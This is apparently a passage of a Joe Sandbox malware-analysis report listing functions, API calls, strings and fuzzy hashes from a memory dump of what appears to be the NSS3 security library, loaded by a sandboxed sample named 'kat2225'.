Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
String ID:
API String ID: 1957633107-0
Opcode ID: 7de7c2498a77d223bd3deee859ef2f8995d53ab194faa4ff563cd42aad7046e9
Instruction ID: a6da2dd2d459acfaf57b149fdd23c1d748b2e112cc6b2374a6bf90133133a30d
Opcode Fuzzy Hash: 7de7c2498a77d223bd3deee859ef2f8995d53ab194faa4ff563cd42aad7046e9
Instruction Fuzzy Hash: 41617BB5E00245CBEB20CFA9D884B9EB7B1AF4835CF144028EC55A7B21E735E844CBB1

Function 6CCC2C40 Relevance: 18.2, APIs: 12, Instructions: 163COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6CCC3F23,?,6CCBE477,?,?,?,00000001,00000000,?,?,6CCC3F23,?), ref: 6CCC2C62
EnterCriticalSection.KERNEL32(0000001C,?,6CCBE477,?,?,?,00000001,00000000,?,?,6CCC3F23,?), ref: 6CCC2C76
PL_HashTableLookup.NSS3(00000000,?,?,6CCBE477,?,?,?,00000001,00000000,?,?,6CCC3F23,?), ref: 6CCC2C86
PR_Unlock.NSS3(00000000,?,?,?,?,6CCBE477,?,?,?,00000001,00000000,?,?,6CCC3F23,?), ref: 6CCC2C93

Part of subcall function 6CD4DD70: TlsGetValue.KERNEL32 ref: 6CD4DD8C
Part of subcall function 6CD4DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CD4DDB4

TlsGetValue.KERNEL32(?,?,?,?,?,6CCBE477,?,?,?,00000001,00000000,?,?,6CCC3F23,?), ref: 6CCC2CC6
EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6CCBE477,?,?,?,00000001,00000000,?,?,6CCC3F23,?), ref: 6CCC2CDA
PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6CCBE477,?,?,?,00000001,00000000,?,?,6CCC3F23), ref: 6CCC2CEA
PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6CCBE477,?,?,?,00000001,00000000,?), ref: 6CCC2CF7
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6CCBE477,?,?,?,00000001,00000000,?), ref: 6CCC2D4D
EnterCriticalSection.KERNEL32(?), ref: 6CCC2D61
PL_HashTableLookup.NSS3(?,?), ref: 6CCC2D71
PR_Unlock.NSS3(?), ref: 6CCC2D7E

Part of subcall function 6CC907A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CC2204A), ref: 6CC907AD
Part of subcall function 6CC907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CC2204A), ref: 6CC907CD
Part of subcall function 6CC907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CC2204A), ref: 6CC907D6
Part of subcall function 6CC907A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CC2204A), ref: 6CC907E4
Part of subcall function 6CC907A0: TlsSetValue.KERNEL32(00000000,?,6CC2204A), ref: 6CC90864
Part of subcall function 6CC907A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CC90880
Part of subcall function 6CC907A0: TlsSetValue.KERNEL32(00000000,?,?,6CC2204A), ref: 6CC908CB
Part of subcall function 6CC907A0: TlsGetValue.KERNEL32(?,?,6CC2204A), ref: 6CC908D7
Part of subcall function 6CC907A0: TlsGetValue.KERNEL32(?,?,6CC2204A), ref: 6CC908FB

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
String ID:
API String ID: 2446853827-0
Opcode ID: dc9ee3a432d5466a944183a35a27cb9f65875954215a3688024aebead46991c6
Instruction ID: 286c7a501cf8870e12a9a60bc2042eba15f18b30238dfe0555a3c3e60f15eea9
Opcode Fuzzy Hash: dc9ee3a432d5466a944183a35a27cb9f65875954215a3688024aebead46991c6
Instruction Fuzzy Hash: 7451E8B5E00205ABEB009F64EC958AA7778FF1935CB048564ED1897B11F731ED68C7E2

Function 6CC24C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6CC23921,6CE014E4,6CD6CC70), ref: 6CC24C97
EnterCriticalSection.KERNEL32(?,?,?,?,6CC23921,6CE014E4,6CD6CC70), ref: 6CC24CB0
PR_Unlock.NSS3(?,?,?,?,?,6CC23921,6CE014E4,6CD6CC70), ref: 6CC24CC9
TlsGetValue.KERNEL32(?,?,?,?,?,6CC23921,6CE014E4,6CD6CC70), ref: 6CC24D11
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6CC23921,6CE014E4,6CD6CC70), ref: 6CC24D2A
PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6CC23921,6CE014E4,6CD6CC70), ref: 6CC24D4A
PR_Unlock.NSS3(?,?,?,?,?,?,?,6CC23921,6CE014E4,6CD6CC70), ref: 6CC24D57
PR_GetCurrentThread.NSS3(?,?,?,?,?,6CC23921,6CE014E4,6CD6CC70), ref: 6CC24D97
PR_Lock.NSS3(?,?,?,?,?,6CC23921,6CE014E4,6CD6CC70), ref: 6CC24DBA
PR_WaitCondVar.NSS3 ref: 6CC24DD4
PR_Unlock.NSS3(?,?,?,?,?,6CC23921,6CE014E4,6CD6CC70), ref: 6CC24DE6
PR_GetCurrentThread.NSS3(?,?,?,?,?,6CC23921,6CE014E4,6CD6CC70), ref: 6CC24DEF

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
String ID:
API String ID: 3388019835-0
Opcode ID: 39b2c7e1140dab62724d752d7d03cea38e337f2c9aaf104eabe8ca567d9f2f72
Instruction ID: c3e6bcacaa73893823b072bfac7503f2c7a1a52c7b2c80fa251004cacc52b12e
Opcode Fuzzy Hash: 39b2c7e1140dab62724d752d7d03cea38e337f2c9aaf104eabe8ca567d9f2f72
Instruction Fuzzy Hash: 7B416AB5A04715CFCB00EFBDE484569BBB4BF09318F058669D8989BB10E734D895CBD2

Function 6CCEECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6CCEDE64), ref: 6CCEED0C
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CCEED22

Part of subcall function 6CCFB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CDD18D0,?), ref: 6CCFB095

PL_FreeArenaPool.NSS3(?), ref: 6CCEED4A
PL_FinishArenaPool.NSS3(?), ref: 6CCEED6B
PR_CallOnce.NSS3(6CE02AA4,6CD012D0), ref: 6CCEED38

Part of subcall function 6CC24C70: TlsGetValue.KERNEL32(?,?,?,6CC23921,6CE014E4,6CD6CC70), ref: 6CC24C97
Part of subcall function 6CC24C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CC23921,6CE014E4,6CD6CC70), ref: 6CC24CB0
Part of subcall function 6CC24C70: PR_Unlock.NSS3(?,?,?,?,?,6CC23921,6CE014E4,6CD6CC70), ref: 6CC24CC9

SECOID_FindOID_Util.NSS3(?), ref: 6CCEED52
PR_CallOnce.NSS3(6CE02AA4,6CD012D0), ref: 6CCEED83
PL_FreeArenaPool.NSS3(?), ref: 6CCEED95
PL_FinishArenaPool.NSS3(?), ref: 6CCEED9D

Part of subcall function 6CD064F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6CD0127C,00000000,00000000,00000000), ref: 6CD0650E

Strings

security, xrefs: 6CCEED06

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
String ID: security
API String ID: 3323615905-3315324353
Opcode ID: 6767aa3a08da8bb39100836779bcc04ea06b119d5147ebcdd4bcdb155c1597ae
Instruction ID: 75587152267ee29ba242d84a6e8eda6dd77825e27fa606c34d927011f00ac175
Opcode Fuzzy Hash: 6767aa3a08da8bb39100836779bcc04ea06b119d5147ebcdd4bcdb155c1597ae
Instruction Fuzzy Hash: 44116A71E0021477E7109B2AAC41BBF7278BF0678CF05056CEC1462E61FB25A61DC6E6

Function 6CCD2CD0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 73COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitToken), ref: 6CCD2CEC
PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6CCD2D07

Part of subcall function 6CDB09D0: PR_Now.NSS3 ref: 6CDB0A22
Part of subcall function 6CDB09D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CDB0A35
Part of subcall function 6CDB09D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CDB0A66
Part of subcall function 6CDB09D0: PR_GetCurrentThread.NSS3 ref: 6CDB0A70
Part of subcall function 6CDB09D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CDB0A9D
Part of subcall function 6CDB09D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CDB0AC8
Part of subcall function 6CDB09D0: PR_vsmprintf.NSS3(?,?), ref: 6CDB0AE8
Part of subcall function 6CDB09D0: EnterCriticalSection.KERNEL32(?), ref: 6CDB0B19
Part of subcall function 6CDB09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CDB0B48
Part of subcall function 6CDB09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CDB0C76
Part of subcall function 6CDB09D0: PR_LogFlush.NSS3 ref: 6CDB0C7E

PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6CCD2D22

Part of subcall function 6CDB09D0: OutputDebugStringA.KERNEL32(?), ref: 6CDB0B88
Part of subcall function 6CDB09D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6CDB0C5D
Part of subcall function 6CDB09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6CDB0C8D
Part of subcall function 6CDB09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CDB0C9C
Part of subcall function 6CDB09D0: OutputDebugStringA.KERNEL32(?), ref: 6CDB0CD1
Part of subcall function 6CDB09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CDB0CEC
Part of subcall function 6CDB09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CDB0CFB
Part of subcall function 6CDB09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CDB0D16
Part of subcall function 6CDB09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6CDB0D26
Part of subcall function 6CDB09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CDB0D35
Part of subcall function 6CDB09D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6CDB0D65
Part of subcall function 6CDB09D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6CDB0D70
Part of subcall function 6CDB09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CDB0D90
Part of subcall function 6CDB09D0: free.MOZGLUE(00000000), ref: 6CDB0D99

PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6CCD2D3B

Part of subcall function 6CDB09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CDB0BAB
Part of subcall function 6CDB09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CDB0BBA
Part of subcall function 6CDB09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CDB0D7E

PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6CCD2D54

Part of subcall function 6CDB09D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CDB0BCB
Part of subcall function 6CDB09D0: EnterCriticalSection.KERNEL32(?), ref: 6CDB0BDE
Part of subcall function 6CDB09D0: OutputDebugStringA.KERNEL32(?), ref: 6CDB0C16

Strings

ulPinLen = %d, xrefs: 6CCD2D36
C_InitToken, xrefs: 6CCD2CE7
slotID = 0x%x, xrefs: 6CCD2D02
pPin = 0x%p, xrefs: 6CCD2D1D
pLabel = 0x%p, xrefs: 6CCD2D4F

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken
API String ID: 420000887-1567254798
Opcode ID: 172d7adea4ce42e289893aefbca3780124a1720e6d103ffe7fe760267cb1b97f
Instruction ID: f0bedd357c6e56fd5de284efc5c946995448f25fb56def38682f43e89c41fd30
Opcode Fuzzy Hash: 172d7adea4ce42e289893aefbca3780124a1720e6d103ffe7fe760267cb1b97f
Instruction Fuzzy Hash: B521C4B6700144AFEB00AF54DD5CA453BB5EB42319F498198E604A7622EB32EC68CBF1

Function 6CDB0EB0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Aborting,?,6CC92357), ref: 6CDB0EB8
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6CC92357), ref: 6CDB0EC0
PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6CDB0EE6

Part of subcall function 6CDB09D0: PR_Now.NSS3 ref: 6CDB0A22
Part of subcall function 6CDB09D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CDB0A35
Part of subcall function 6CDB09D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CDB0A66
Part of subcall function 6CDB09D0: PR_GetCurrentThread.NSS3 ref: 6CDB0A70
Part of subcall function 6CDB09D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CDB0A9D
Part of subcall function 6CDB09D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CDB0AC8
Part of subcall function 6CDB09D0: PR_vsmprintf.NSS3(?,?), ref: 6CDB0AE8
Part of subcall function 6CDB09D0: EnterCriticalSection.KERNEL32(?), ref: 6CDB0B19
Part of subcall function 6CDB09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CDB0B48
Part of subcall function 6CDB09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CDB0C76
Part of subcall function 6CDB09D0: PR_LogFlush.NSS3 ref: 6CDB0C7E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6CDB0EFA

Part of subcall function 6CC9AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6CC9AF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CDB0F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CDB0F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CDB0F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CDB0F2B

Strings

Assertion failure: %s, at %s:%d, xrefs: 6CDB0ED9, 6CDB0EE5, 6CDB0F06, 6CDB0F0B
Aborting, xrefs: 6CDB0EB3

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: DebugPrintR_snprintf__acrt_iob_funcabort$BreakCriticalCurrentEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime__stdio_common_vfprintffflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 3905088656-1374795319
Opcode ID: be44dbf18f5aa3a30508174147514da71db75818cbe382620dab0fc35d203773
Instruction ID: 0fddde3f087d334da28132e1a0b9e3e47ee2fe55c23d277587f6728a11606c3a
Opcode Fuzzy Hash: be44dbf18f5aa3a30508174147514da71db75818cbe382620dab0fc35d203773
Instruction Fuzzy Hash: 12F0A4F59001187BFE107B61AC49C9F3E2DEFC6668F044024FE1956712DA35E92897F2

Function 6CD14DB0 Relevance: 16.9, APIs: 11, Instructions: 395memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400), ref: 6CD14DCB

Part of subcall function 6CD00FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CCA87ED,00000800,6CC9EF74,00000000), ref: 6CD01000
Part of subcall function 6CD00FF0: PR_NewLock.NSS3(?,00000800,6CC9EF74,00000000), ref: 6CD01016
Part of subcall function 6CD00FF0: PL_InitArenaPool.NSS3(00000000,security,6CCA87ED,00000008,?,00000800,6CC9EF74,00000000), ref: 6CD0102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6CD14DE1

Part of subcall function 6CD010C0: TlsGetValue.KERNEL32(?,6CCA8802,00000000,00000008,?,6CC9EF74,00000000), ref: 6CD010F3
Part of subcall function 6CD010C0: EnterCriticalSection.KERNEL32(?,?,6CCA8802,00000000,00000008,?,6CC9EF74,00000000), ref: 6CD0110C
Part of subcall function 6CD010C0: PL_ArenaAllocate.NSS3(?,?,?,6CCA8802,00000000,00000008,?,6CC9EF74,00000000), ref: 6CD01141
Part of subcall function 6CD010C0: PR_Unlock.NSS3(?,?,?,6CCA8802,00000000,00000008,?,6CC9EF74,00000000), ref: 6CD01182
Part of subcall function 6CD010C0: TlsGetValue.KERNEL32(?,6CCA8802,00000000,00000008,?,6CC9EF74,00000000), ref: 6CD0119C

PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6CD14DFF
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CD14E59

Part of subcall function 6CCFFAB0: free.MOZGLUE(?,-00000001,?,?,6CC9F673,00000000,00000000), ref: 6CCFFAC7

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CDD300C,00000000), ref: 6CD14EB8
SECOID_FindOID_Util.NSS3(?), ref: 6CD14EFF
memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6CD14F56
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CD1521A

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
String ID:
API String ID: 1025791883-0
Opcode ID: ff9833e5be5a11b2148cd3454dd1e5cd3e03f822c6cbcf041c69dfb2091308f8
Instruction ID: a0ed3c8b3bbbdcbd3c4d9baca0fba7653d4d3f0550bc1bbc2be5533f0ab9a5ec
Opcode Fuzzy Hash: ff9833e5be5a11b2148cd3454dd1e5cd3e03f822c6cbcf041c69dfb2091308f8
Instruction Fuzzy Hash: 98F18BB1E08209CFDB04CF54E8407AEB7B2BF44358F254169E915ABBA1E775E981CB90

Function 6CD10C60 Relevance: 16.7, APIs: 11, Instructions: 153memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(6CD12C2A), ref: 6CD10C81

Part of subcall function 6CCFBE30: SECOID_FindOID_Util.NSS3(6CCB311B,00000000,?,6CCB311B,?), ref: 6CCFBE44

Part of subcall function 6CCE8500: SECOID_GetAlgorithmTag_Util.NSS3(6CCE95DC,00000000,00000000,00000000,?,6CCE95DC,00000000,00000000,?,6CCC7F4A,00000000,?,00000000,00000000), ref: 6CCE8517

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CD10CC4

Part of subcall function 6CCFFAB0: free.MOZGLUE(?,-00000001,?,?,6CC9F673,00000000,00000000), ref: 6CCFFAC7

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CD10CD5
PORT_ZAlloc_Util.NSS3(0000101C), ref: 6CD10D1D
PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6CD10D3B
PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6CD10D7D
free.MOZGLUE(00000000), ref: 6CD10DB5
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CD10DC1
free.MOZGLUE(00000000), ref: 6CD10DF7
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CD10E05
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CD10E0F

Part of subcall function 6CCE95C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6CCC7F4A,00000000,?,00000000,00000000), ref: 6CCE95E0
Part of subcall function 6CCE95C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6CCC7F4A,00000000,?,00000000,00000000), ref: 6CCE95F5
Part of subcall function 6CCE95C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6CCE9609
Part of subcall function 6CCE95C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CCE961D
Part of subcall function 6CCE95C0: PK11_GetInternalSlot.NSS3 ref: 6CCE970B
Part of subcall function 6CCE95C0: PK11_FreeSymKey.NSS3(00000000), ref: 6CCE9756
Part of subcall function 6CCE95C0: PK11_GetIVLength.NSS3(?), ref: 6CCE9767
Part of subcall function 6CCE95C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6CCE977E
Part of subcall function 6CCE95C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CCE978E

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
String ID:
API String ID: 3136566230-0
Opcode ID: 02e9770ed86c8bfa17fdd7b79efde55ffa3601153567fff430255f1fcfce3fb7
Instruction ID: 3c557af978190b74af680f21a019af74f2db49ce4a577bd594f2c2e58c3a0a85
Opcode Fuzzy Hash: 02e9770ed86c8bfa17fdd7b79efde55ffa3601153567fff430255f1fcfce3fb7
Instruction Fuzzy Hash: 0441C2B1904245ABEB00AF64EC41BAF7A74EF45358F140028EA1557F51F735FA64CBE2

Function 6CCA4FD0 Relevance: 16.6, APIs: 11, Instructions: 112COMMON

Download Yara Rule

APIs

PR_NewLock.NSS3(00000001,00000000,6CDF0148,?,6CCB6FEC), ref: 6CCA502A
PR_NewLock.NSS3(00000001,00000000,6CDF0148,?,6CCB6FEC), ref: 6CCA5034
PL_NewHashTable.NSS3(00000000,6CCFFE80,6CCFFD30,6CD4C350,00000000,00000000,00000001,00000000,6CDF0148,?,6CCB6FEC), ref: 6CCA5055
PL_NewHashTable.NSS3(00000000,6CCFFE80,6CCFFD30,6CD4C350,00000000,00000000,?,00000001,00000000,6CDF0148,?,6CCB6FEC), ref: 6CCA506D

Memory Dump Source

